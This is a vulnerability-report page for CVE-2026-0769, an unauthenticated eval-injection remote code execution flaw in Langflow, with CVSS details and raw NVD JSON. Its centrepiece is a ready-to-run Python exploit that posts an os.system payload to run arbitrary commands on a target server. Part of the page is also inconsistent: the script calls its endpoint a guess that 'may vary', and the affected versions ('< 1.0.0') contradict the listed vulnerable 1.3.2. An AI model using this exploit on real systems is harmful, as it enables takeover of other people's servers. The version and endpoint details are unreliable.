Security Vulnerability Report
中文
CVE-2026-0769 CVSS 9.8 CRITICAL

CVE-2026-0769

Published: 2026-01-23 04:16:04
Last Modified: 2026-02-18 16:43:31
Source: [email protected]

Description

Langflow eval_custom_component_code Eval Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of eval_custom_component_code function. The issue results from the lack of proper validation of a user-supplied string before using it to execute python code. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-26972.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:langflow:langflow:1.3.2:*:*:*:*:*:*:* - VULNERABLE
Langflow < 1.0.0 (all versions prior to patch)
Langflow eval_custom_component_code function (unpatched versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2026-0769 PoC - Langflow RCE via eval_custom_component_code # This PoC demonstrates the remote code execution vulnerability in Langflow import requests import json import sys def exploit(target_url, command="whoami"): """ Exploit CVE-2026-0769 by injecting malicious code through eval_custom_component_code Args: target_url: Base URL of the vulnerable Langflow instance command: System command to execute on the target """ # The vulnerability exists in eval_custom_component_code function # Malicious payload using Python's __import__ to execute system commands payload = f"__import__('os').system('{command}')" # Alternative payload using subprocess module # payload = f"__import__('subprocess').check_output('{command}', shell=True)" try: # Send the malicious payload to the vulnerable endpoint # The exact endpoint may vary based on Langflow version endpoint = f"{target_url.rstrip('/')}/api/v1/custom_component/eval" headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } data = { 'code': payload, 'function': 'eval_custom_component_code' } print(f"[*] Targeting: {endpoint}") print(f"[*] Payload: {payload}") response = requests.post(endpoint, json=data, headers=headers, timeout=10) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") if response.status_code == 200: print("[+] Exploit successful! Command executed.") else: print("[-] Exploit failed. Check the target and payload.") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_url> [command]") print(f"Example: {sys.argv[0]} http://target.com:7860 whoami") sys.exit(1) target = sys.argv[1] cmd = sys.argv[2] if len(sys.argv) > 2 else "whoami" exploit(target, cmd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0769", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:03.933", "lastModified": "2026-02-18T16:43:31.297", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Langflow eval_custom_component_code Eval Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of eval_custom_component_code function. The issue results from the lack of proper validation of a user-supplied string before using it to execute python code. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-26972."}, {"lang": "es", "value": "Vulnerabilidad de ejecución remota de código por inyección de eval en Langflow eval_custom_component_code. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de Langflow. La autenticación no es necesaria para explotar esta vulnerabilidad.\n\nLa falla específica reside en la implementación de la función eval_custom_component_code. El problema se debe a la falta de validación adecuada de una cadena proporcionada por el usuario antes de usarla para ejecutar código Python. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto del proceso actual. Fue ZDI-CAN-26972."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-95"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langflow:langflow:1.3.2:*:*:*:*:*:*:*", "matchCriteriaId": "2BBE2B7A-5520-4886-8087-E6A96ABC0BD2"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-035/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.